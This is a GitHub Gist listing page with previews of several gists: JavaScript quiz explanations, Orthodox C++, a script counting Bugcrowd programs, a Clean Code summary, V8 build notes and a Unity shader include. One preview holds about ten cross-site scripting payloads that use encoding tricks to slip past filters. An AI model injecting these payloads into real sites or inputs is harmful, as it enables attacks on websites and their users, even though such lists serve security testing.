Skip to content

Instantly share code, notes, and snippets.

View raigorx's full-sized avatar
Hardcore Study mode

Raigorx Hellscream raigorx

Hardcore Study mode
View GitHub Profile
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@MattSurabian
MattSurabian / JS Quiz Answer Explanations.md
Last active October 11, 2023 19:38
My attempt to explain the answers for David Shariff's feelings hurting JS quiz found at: davidshariff.com/js-quiz/

Are your feelings hurt?

If you rushed through David Shariff's JS Quiz or are just new to JS they might be. I know mine were. After I dried my eyes, I took the quiz again, this time very slowly trying to get at the meat behind each answer. Below is my attempt to explain each question's answer and offer some interesting permutations so that others can move beyond their hurt feelings and come out the other side better JS developers.

I initially thought I'd turn this into a blog post but think it's probably better as a gist.

Question #1

Don't over think it.

var foo = function foo() {
@bkaradzic
bkaradzic / orthodoxc++.md
Last active November 15, 2024 12:57
Orthodox C++

Orthodox C++

What is Orthodox C++?

Orthodox C++ (sometimes referred as C+) is minimal subset of C++ that improves C, but avoids all unnecessary things from so called Modern C++. It's exactly opposite of what Modern C++ suppose to be.

Why not Modern C++?

@bl4de
bl4de / get_programs.sh
Last active July 12, 2017 06:57
How many bug bounty programs listed on Bugcrowd
#!/bin/bash
#
# -- @_bl4de https://twitter/_bl4de
#
# -- This script checks how many programs are listed on
# -- https://bugcrowd.com/list-of-bug-bounty-programs
#
echo "[+] get list of bugbounty programs from Bugcrowd..."
curl --silent -o tmp.list https://bugcrowd.com/list-of-bug-bounty-programs
@wojteklu
wojteklu / clean_code.md
Last active November 15, 2024 07:19
Summary of 'Clean code' by Robert C. Martin

Code is clean if it can be understood easily – by everyone on the team. Clean code can be read and enhanced by a developer other than its original author. With understandability comes readability, changeability, extensibility and maintainability.


General rules

  1. Follow standard conventions.
  2. Keep it simple stupid. Simpler is always better. Reduce complexity as much as possible.
  3. Boy scout rule. Leave the campground cleaner than you found it.
  4. Always find root cause. Always look for the root cause of a problem.

Design rules

Building Chrome V8 on Windows

In order to be able to build v8 from scratch on Windows for x64, please follow the following steps.

These instructions were updated to work with Windows 11 Build 10.0.22621, but this should also work on WInodws 10

NOTE: While the Chrome team does provide decent documentation, there are some nuances and other additional steps that must be done for v8 to compile on Windows.

Documentation:

@FreyaHolmer
FreyaHolmer / GpuPrinter.cginc
Last active November 1, 2024 23:31
A unity shader .cginc to draw numbers in the fragment shader - see the first comment below for example usage!
///////////////////////////////////////////////////////////////////////////////
// ABOUT: A unity Shader .cginc to draw numbers in the fragment shader
// AUTHOR: Freya Holmér
// LICENSE: Use for whatever, commercial or otherwise!
// Don't hold me liable for issues though
// But pls credit me if it works super well <3
// LIMITATIONS: There's some precision loss beyond 3 decimal places
// CONTRIBUTORS: yes please! if you know a more precise way to get
// decimal digits then pls lemme know!
// GetDecimalSymbolAt() could use some more love/precision